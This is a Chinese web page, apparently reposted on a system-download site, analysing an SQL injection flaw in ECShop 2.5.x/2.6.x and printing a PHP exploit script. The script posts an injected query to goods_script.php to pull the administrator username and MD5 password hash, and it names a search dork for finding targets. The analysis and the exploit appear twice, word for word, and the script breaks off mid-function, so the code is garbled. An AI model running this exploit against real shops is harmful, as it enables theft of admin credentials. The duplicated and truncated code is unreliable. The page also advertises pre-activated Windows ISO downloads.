ECShop 注射漏洞分析
来源:Ghost系统之家浏览:时间:2022-09-12 18:00:18
影响2.5.x和2.6.x,其他版本未测试
goods_script.php
44行:
复制代码代码如下:
if (empty($_GET['type']))
{
...
}
elseif ($_GET['type'] == 'collection')
{
...
}
$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
$res = $db->query($sql);
$sql没有初始化,很明显的一个漏洞:)
EXP:
复制代码代码如下:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
* works with register_globals = On
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$resp = send();
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
if ($hash)
exit("Expoilt Success!admin:\t$hash[1]Password(md5):\t$hash[2]");
else
exit("Exploit Failed!");
function send()
{
global $host, $path;
$cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1";
$data .= "Accept: */*";
$data .= "Accept-Language: zh-cn";
$data .= "Content-Type: application/x-www-form-urlencoded";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; windows NT 5.1; SV1)";
$data .= "Host: $host";
$data .= "Content-Length: ".strlen($cmd)."";
$data .= "Connection: Close";
$data .= $cmd;
goods_script.php
44行:
复制代码代码如下:
if (empty($_GET['type']))
{
...
}
elseif ($_GET['type'] == 'collection')
{
...
}
$sql .= " LIMIT " . (!empty($_GET['goods_num']) ? intval($_GET['goods_num']) : 10);
$res = $db->query($sql);
$sql没有初始化,很明显的一个漏洞:)
EXP:
复制代码代码如下:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://bbs.wolvez.org
dork: "Powered by ECShop"
+---------------------------------------------------------------------------+
');
/**
* works with register_globals = On
*/
if ($argc < 3) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to ecshop
Example:
php '.$argv[0].' localhost /ecshop/
+---------------------------------------------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$resp = send();
preg_match('#href="([\S]+):([a-z0-9]{32})"#', $resp, $hash);
if ($hash)
exit("Expoilt Success!admin:\t$hash[1]Password(md5):\t$hash[2]");
else
exit("Exploit Failed!");
function send()
{
global $host, $path;
$cmd = 'sql=SELECT CONCAT(user_name,0x3a,password) as goods_id FROM ecs_admin_user WHERE action_list=0x'.bin2hex('all').' LIMIT 1#';
$data = "POST ".$path."goods_script.php?type=".time()." HTTP/1.1";
$data .= "Accept: */*";
$data .= "Accept-Language: zh-cn";
$data .= "Content-Type: application/x-www-form-urlencoded";
$data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; windows NT 5.1; SV1)";
$data .= "Host: $host";
$data .= "Content-Length: ".strlen($cmd)."";
$data .= "Connection: Close";
$data .= $cmd;
推荐系统
番茄花园 Windows 10 极速企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10番茄花园 Windows 10 32位极速企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
新萝卜家园电脑城专用系统 Windows10 x86 企业版 版本1507 2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新萝卜家园电脑城专用系统 Windows10 x86企业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(32位) ISO镜像快速下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows 10 32位企业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
笔记本&台式机专用系统 Windows10 企业版 版本1903 2022年7月(64位) 提供下载
语言:中文版系统大小:3.98GB系统类型:Win10笔记本台式机专用系统 Windows10 64专业版 v2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动
雨林木风 Windows10 x64 企业装机版 版本1903 2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10新雨林木风 Windows10 x64 企业装机版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活
深度技术 Windows 10 x64 企业版 电脑城装机版 版本1903 2022年7月(64位) 高速下载
语言:中文版系统大小:3.98GB系统类型:Win10深度技术 Windows 10 x64 企业TLSB 电脑城装机版2022年7月 一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程
电脑公司 装机专用系统Windows10 x64 企业版2022年7月(64位) ISO镜像高速下载
语言:中文版系统大小:3.98GB系统类型:Win10电脑公司 装机专用系统 Windows10 x64 企业TLSB版2022年7月一、系统主要特点: 使用微软Win10正式发布的企业TLSB版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过
新雨林木风 Windows10 x86 企业装机版2022年7月(32位) ISO镜像高速下载
语言:中文版系统大小:3.15GB系统类型:Win10新雨林木风 Windows10 x86 专业版 2022年7月 一、系统主要特点: 使用微软Win10正式发布的专业版制作; 安装过程全自动无人值守,无需输入序列号,全自动设置; 安装完成后使用Administrator账户直接登录系统,无需手动设置账号。 安装过程中自动激活系统,无
相关文章
- U盘修复工具 U盘修复技巧及案例
- 千寻漫画盒怎么用以及如何下载网络漫画的图文教程
- 详解DDoS工具 一款流行DDoS木马工具
- 策略使用加密狗进行加密
- windows 7蓝屏代码含义大全
- 如何只让电脑向U盘拷贝文件,禁止U盘向电脑拷贝文件、电脑文件防复制的方法
- 多个D-Link 产品含跨站脚本攻击以及拒绝服务漏洞
- 《解除好友2》:我们离暗网有多远
- Discuz!!论坛wap功能模块编码的注射漏洞分析
- 我们不知道的秘密? 黑客可以使用硬件破解GSM A5加密算法
- Win10微软小娜无法连接网络怎么办?微软小娜无法连接网络问题解决方法
- 网络上传图片常见问题 用好照片来帮你解决
- 用Dos命令进行加锁 防病毒格式化硬盘
- 笔记本win7系统无线网络出现红叉并且不能使用网络的解决方法
热门系统
- 1华硕笔记本&台式机专用系统 GhostWin7 32位正式旗舰版2018年8月(32位)ISO镜像下载
系统大小:3.13GB系统类型:Win7 - 2雨林木风 Ghost Win7 SP1 装机版 2020年4月(32位) 提供下载
系统大小:3.13GB系统类型:Win7 - 3深度技术 Windows 10 x86 企业版 电脑城装机版2018年10月(32位) ISO镜像免费下载
系统大小:3.98GB系统类型:Win10 - 4电脑公司 装机专用系统Windows10 x86喜迎国庆 企业版2020年10月(32位) ISO镜像快速下载
系统大小:3.98GB系统类型:Win10 - 5深度技术 Windows 10 x86 企业版 六一节 电脑城装机版 版本1903 2022年6月(32位) ISO镜像免费下载系统大小:3.98GB系统类型:Win10
- 6深度技术 Windows 10 x64 企业版 电脑城装机版2021年1月(64位) 高速下载系统大小:3.98GB系统类型:Win10
- 7新萝卜家园电脑城专用系统 Windows10 x64 企业版2019年10月(64位) ISO镜像免费下载
系统大小:3.98GB系统类型:Win10 - 8新萝卜家园 GhostWin7 SP1 最新电脑城极速装机版2018年8月(32位)ISO镜像下载
系统大小:3.13GB系统类型:Win7 - 9电脑公司Ghost Win8.1 x32 精选纯净版2022年5月(免激活) ISO镜像高速下载
系统大小:3.45GB系统类型:Win8 - 10新萝卜家园Ghost Win8.1 X32 最新纯净版2018年05(自动激活) ISO镜像免费下载
系统大小:3.45GB系统类型:Win8
热门文章
- 1华为手环6pro有游泳功能吗-支持游泳模式吗
- 2重装上阵新赛季有哪些重型武器_重装上阵新赛季重型武器列表
- 3使用win7中本地搜索功能时四个技巧快速找到文件的操作方如何用win7的搜索功能法
- 4premiere怎么更改素材序列? premiere更改序列设置的方法
- 5天天酷跑布鲁与冰原狼仔哪一个好 布鲁好还是冰原狼仔好
- 6斐讯k1路由器刷Breed BootLoader(不死UBoot)教程
- 7路由器密码忘了怎么办 无线路由器登陆密码忘了解决方法【详解】
- 8战双帕弥什超频晶币极如何获得_战双帕弥什超频晶币极获得方法
- 9Redmi AirDots 3 Pro体验如何 Redmi AirDots 3 Pro详细评测
- 10安全事件应急响应工具箱
常用系统
- 1雨林木风Ghost Win8.1 (X64) 极速纯净版2022年1月免激活) ISO镜像高速下载
系统大小:3.96GB系统类型:Win8 - 2新萝卜家园Ghost Win8.1 X64位 纯净版2022年1月(自动激活) ISO镜像高费下载
系统大小:3.96GB系统类型:Win8 - 3番茄花园 Windows 10 官方企业版 版本1903 2022年6月(64位) ISO高速下载
系统大小:3.98GB系统类型:Win10 - 4番茄花园Ghost Win8.1 x64 办公纯净版2019年5月(激活版) ISO镜像高速下载
系统大小:3.96GB系统类型:Win8 - 5电脑公司 装机专用系统Windows10 x86企业版2020年5月(32位) ISO镜像快速下载系统大小:3.98GB系统类型:Win10
- 6电脑公司 装机专用系统Windows10 x64 企业装机版 版本1507 2022年7月(64位) ISO镜像高速下载系统大小:3.98GB系统类型:Win10
- 7番茄花园GhostWin7 SP1电脑城极速装机版2019年11月(32位) 最新高速下载
系统大小:3.13GB系统类型:Win7 - 8雨林木风Ghost Win8.1 (X32) 新春特别 快速纯净版2022年2月(免激活) ISO镜像快速下载
系统大小:3.45GB系统类型:Win8 - 9新萝卜家园 Ghost Win7 x64 SP1 极速版2019年5月(64位) 高速下载
系统大小:3.91GB系统类型:Win7 - 10番茄花园Ghost Win8.1 x64 办公纯净版2019年6月(激活版) ISO镜像高速下载系统大小:3.96GB系统类型:Win8